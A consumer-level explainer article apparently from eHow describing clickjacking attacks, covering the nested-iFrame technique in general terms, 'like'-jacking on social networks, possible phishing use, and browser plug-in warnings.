Featured:
Allergies
Tech Know
Grilling Guide
eHow Now Blog

What Are Clickjacking Attacks?

A clickjacking attack, also known as a user interface (UI) redress attack, occurs when an attacker attempts to hijack the clicks of a computer mouse to perform actions that the user did not intend. Essentially, a user believes she is interacting with the Web page displayed on the computer screen, but her actions are actually performed on another Web page selected by the hijacker.

  1. iFrame

    • Clickjacking attacks take advantage of a Hypertext Markup Language (HTML) property known as inline Frame or iFrame. iFrame allows one HTML document to be embedded, inside a frame, in another HTML document. An attacker can load a malicious page into an iFrame and use Cascading Style Sheets (CSS) to hide everything except the region of the page on which he wants users to click.

    Scripting

    • A typical clickjacking attack uses two, nested iFrames. The outer iFrame is the smaller of the two and acts as a window onto the inner iFrame, while the inner iFrame must be large enough that the target region, or element, is "visible" without scrolling. The scripting language known as JavaScript can be used to create an invisible, moving iFrame, which positions itself under the mouse cursor, so that the user clicks on the target regardless of where she clicks on the page; in this case, the outer iFrame can be just 10 or 20 pixels square.

    Nuisance

    • Clickjacking attacks work across all computer operating systems, but, so far, have been used only to create a nuisance on social networking sites, such as Facebook and Twitter. Facebook users, for example, may see links to subjects that their friends have apparently "liked." The links, however, are entirely spurious and, in fact, redirect users to a page containing some instruction, such as to click a button confirming they are over 18 years of age. What users are actually doing, however, is clicking on an invisible "like" button, so that they, too, recommend the malicious page.

    Phishing & Malware

    • Clickjacking attacks may not have been used for fraudulent purposes, such as phishing, or delivering malicious software, or malware, but according to Graham Cluley, the senior technology consultant at Sophos, the potential exists for them to be adapted to do so. Certain Web browsers include small, free programs, or plug-ins, that warn against potential clickjacking attacks. These programs do, however, typically require some technical know-how and also warns against clicking on Flash videos, which are widely used, legitimately, on the Web.

Related Searches:

References

Comments

Related Ads

thumbnail
Featured